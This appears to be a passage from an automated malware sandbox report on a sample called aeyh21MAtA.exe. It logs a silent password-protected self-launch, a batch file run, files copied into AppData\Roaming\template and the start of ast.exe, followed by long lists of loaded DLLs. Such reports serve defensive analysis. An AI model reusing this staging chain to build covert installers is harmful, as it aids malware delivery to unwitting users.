                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpProcess created: C:\Users\user\Desktop\aeyh21MAtA.exe "C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxcJump to behavior
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeProcess created: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp "C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmp" /SL5="$20464,6701859,404480,C:\Users\user\Desktop\aeyh21MAtA.exe" /verysilent /password=lzueuxcJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\u7i3kw\9vsl3c.bat""Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\u7i3kw\*" "C:\Users\user\AppData\Roaming\template\"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\template\ast.exe "C:\Users\user\AppData\Roaming\template\ast.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\aeyh21MAtA.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: sfc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-PD76Q.tmp\aeyh21MAtA.tmpSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ulib.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ifsutil.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: devobj.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: fsutilext.dllJump to behavior
                          Source: C:\Windows\SysWOW64\xcopy.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: sqlite3.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: crtdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: quartz.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: colorui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: mscms.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: coloradapterclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: compstui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: inetres.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dbgcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: d3d11.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dxgi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: astcrp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: libssl-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: libcrypto-1_1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: powrprof.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: umpdc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dataexchange.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dcomp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: twinapi.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: sqlite3.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: crtdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: quartz.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: colorui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: mscms.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: coloradapterclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: compstui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: inetres.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: olepro32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: sqlite3.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: crtdll.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: quartz.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: avifil32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msacm32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winmmbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: logoncli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: samcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: colorui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: mscms.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: coloradapterclient.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: compstui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: inetres.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: security.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\template\ast.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-MK5MR.tmp\aeyh21MAtA.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
